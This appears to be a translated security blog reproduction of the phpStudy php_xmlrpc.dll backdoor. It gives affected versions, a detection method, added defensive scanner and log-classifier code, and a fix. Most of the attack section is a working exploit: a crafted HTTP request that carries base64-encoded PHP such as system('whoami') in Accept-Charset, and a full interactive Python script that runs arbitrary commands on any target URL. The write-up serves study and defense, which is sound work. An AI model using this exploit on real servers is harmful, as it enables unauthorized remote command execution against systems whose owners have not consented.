phpStudy backdoor reproduction + PoC

phpStudy backdoor reproduction

Author: thelostworld_fv (秋刀鱼)

Vulnerability details:

phpStudy is a free PHP debugging environment bundle popular in China. It installs Apache, PHP, MySQL, phpMyAdmin and ZendOptimizer in one step and can be used without any configuration, providing both a PHP debugging environment and PHP development tooling; it has close to a million PHP learners and developers as users in China. On September 20 the Hangzhou public security WeChat account published the article "杭州警方通报打击涉网违法犯罪暨“净网2019”专项行动战果" (Hangzhou police report on the results of the "Clean Net 2019" campaign against cyber crime), which states that phpStudy contains a "backdoor".


Affected versions:

php-5.2.17, php-5.4.45


Detection method:

Analysis shows that the backdoor code lives in the \ext\php_xmlrpc.dll module.

It is present in the php-5.2.17 and php-5.4.45 builds bundled with phpStudy2016 and phpStudy2018.

phpStudy2016 paths

php\php-5.2.17\ext\php_xmlrpc.dll

php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018 paths

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll

PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

Open the corresponding file in Notepad and search for the keyword @eval.

This write-up uses phpStudy2016 (the 2018 and 2016 versions really are hard to find :>)

php-5.2.17 version




php-5.4.45 version


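As an added example (not from the original post), the Notepad search above can be automated: this Python scanner walks a phpStudy install directory, reads every php_xmlrpc.dll it finds, and reports the offset and printable context of the first @eval marker. The sample module bytes at the bottom are constructed for the check and are not real DLL contents.

```python
import os
import string
import sys

# The page's detection rule: a clean php_xmlrpc.dll does not contain the string "@eval".
MARKER = b"@eval"
# Printable bytes kept when showing context around a hit (whitespace other than space dropped).
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def find_marker(data: bytes, context: int = 40):
    """Return (offset, printable context) of the first @eval in the bytes, or None."""
    idx = data.find(MARKER)
    if idx == -1:
        return None
    window = data[idx:idx + context]
    text = bytes(b for b in window if b in PRINTABLE).decode("ascii")
    return idx, text


def scan_install(root: str):
    """Walk a phpStudy tree (e.g. php\\ or PHPTutorial\\) and list every tainted php_xmlrpc.dll."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower() != "php_xmlrpc.dll":
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                hit = find_marker(fh.read())
            if hit is not None:
                hits.append((path, hit[0], hit[1]))
    return hits


# Constructed stand-ins for a clean and a tainted module (not real DLL bytes).
CLEAN_SAMPLE = b"MZ\x90\x00" + b"\x00" * 16 + b"xmlrpc_encode\x00xmlrpc_decode\x00"
TAINTED_SAMPLE = CLEAN_SAMPLE + b"\x00\x00" + b"@eval(CONSTRUCTED_SAMPLE);\x00" + b"\x00" * 8

if __name__ == "__main__":
    # Usage: python scan_xmlrpc.py <phpStudy install directory>
    for path, offset, ctx in scan_install(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"[!] {path}: @eval at offset {offset:#x}: {ctx}")
```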



Reproduction:

Start the PHP version that carries the backdoor




Environment started successfully




Intercept the request and add the following header fields:

The space after the comma in Accept-Encoding must be removed

Accept-Encoding: gzip,deflate

Accept-Charset is the base64 encoding of echo system('whoami')

Accept-Charset: ZWNobyBzeXN0ZW0oIndob2FtaSIpOw==




Full request payload

GET / HTTP/1.1
Host: 10.211.55.3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Charset: <your base64-encoded PHP statement>
Accept-Language: zh-CN,zh;q=0.9
Connection: close
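Added example (not part of the original post): the header combination above is exactly what a defender can match on in proxy or web-server logs. This Python code parses a raw request head, requires the no-space form Accept-Encoding: gzip,deflate, base64-decodes Accept-Charset and flags the request when the result looks like a PHP call. The two sample requests are constructed from the headers shown on this page; the list of PHP function names is an assumption.

```python
import base64
import binascii
import re


def parse_headers(raw: str) -> dict:
    """Parse the head of a raw HTTP/1.1 request into a dict keyed by lowercase header name."""
    headers = {}
    for line in raw.replace("\r\n", "\n").split("\n")[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def decode_charset(value: str):
    """Return Accept-Charset decoded as base64 UTF-8 text, or None when it is not valid base64."""
    if not value:
        return None
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


# PHP calls typically pushed through the backdoor (assumed list; extend as needed).
PHP_CALL = re.compile(r"\b(system|exec|shell_exec|passthru|eval|phpinfo|assert)\s*\(")


def classify_request(raw: str):
    """Return ('backdoor-trigger', decoded), ('suspicious', decoded) or ('benign', None)."""
    h = parse_headers(raw)
    trigger = h.get("accept-encoding") == "gzip,deflate"  # note: no space after the comma
    decoded = decode_charset(h.get("accept-charset", ""))
    if trigger and decoded is not None and PHP_CALL.search(decoded):
        return "backdoor-trigger", decoded
    if trigger and decoded is not None:
        return "suspicious", decoded
    return "benign", None


# Constructed samples: the first mirrors the request on this page, the second a normal browser request.
BACKDOOR_REQUEST = (
    "GET / HTTP/1.1\r\nHost: 10.211.55.3\r\n"
    "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0\r\n"
    "Accept-Encoding: gzip,deflate\r\nAccept-Charset: ZWNobyBzeXN0ZW0oIndob2FtaSIpOw==\r\n"
    "Accept-Language: zh-CN,zh;q=0.9\r\nConnection: close\r\n\r\n"
)
BENIGN_REQUEST = (
    "GET / HTTP/1.1\r\nHost: 10.211.55.3\r\nAccept-Encoding: gzip, deflate\r\n"
    "Accept-Charset: utf-8\r\nConnection: close\r\n\r\n"
)
```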



Output of whoami




Trying ipconfig




Screenshot of the Python verification script:




Verification script (the one below is fairly complete and easy to use; after trying many I settled on this one):

import requests
import base64
from random import choice

# Pool of User-Agent strings; one is picked at random per request.
USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
    "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]

TIME_OUT = 10

print(r"""
Usage & e.g. :
Target Url:
localhost/flag.php
Input Your Command:
phpinfo();

Notice: Command Must Be PHP Function, If You Want To Execute OS Command, Use: system('YOUR COMMAND');
By:Sp4ce
Have Fun
""")


def checkTarget(url):
    # Probe with base64("phpinfo();") in Accept-Charset and look for the phpinfo page in the reply.
    poc = {
        "Accept-Charset": "cGhwaW5mbygpOw==",
        "Accept-Encoding": "gzip,deflate"
    }
    try:
        pocRequest = requests.get(url, headers=poc, timeout=TIME_OUT)
        if "phpinfo" in str(pocRequest.content):
            print('[+] Target is vulnerable.')
            return True
        else:
            print('[-] Target is NOT vulnerable.')
            return False
    except Exception:
        print('[-] Looks Like Something Wrong.')
        return False


def exploit(url, command):
    # command is the base64-encoded PHP statement; it travels in the Accept-Charset header.
    headers = {}
    headers['User-Agent'] = choice(USER_AGENTS)
    headers['Accept-Encoding'] = 'gzip,deflate'
    headers['Accept-Charset'] = command
    try:
        request = requests.get(url, headers=headers, timeout=TIME_OUT)
        if request.status_code == 200:
            print('[+] Command Execute Successful.')
            print(request.text)
        else:
            print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
    except Exception:
        print('[-] Looks Like Something Wrong.\n')


if __name__ == "__main__":
    while True:
        url = input("Target Url:\n")
        if 'http' not in url:
            url = "http://" + url
        print('[i] Checking Target...')
        if checkTarget(url):
            cmd = input("Input Your Command:\n")
            # Encode the PHP statement as base64 text for the header value.
            command = base64.b64encode(cmd.encode('utf-8')).decode('ascii')
            exploit(url, command)



Fix:

Download the original php-5.4.45 or php-5.2.17 release from the official PHP site and replace php_xmlrpc.dll with the copy from it. Download addresses:

windows.php.net/downloa

windows.php.net/downloa


Summary:

1. Environment setup: download the 2018 or 2016 installer and, after installing, check whether the corresponding file is present. This wasted a lot of time; the environments are hard to find.

2. When base64-encoding the payload, pay attention to whether the semicolon is included, for example: system('whoami'); .

3. Bored over the weekend, I picked a vulnerability to reproduce (in security, persistence is what counts). If there are any mistakes, I hope the experts will correct me.


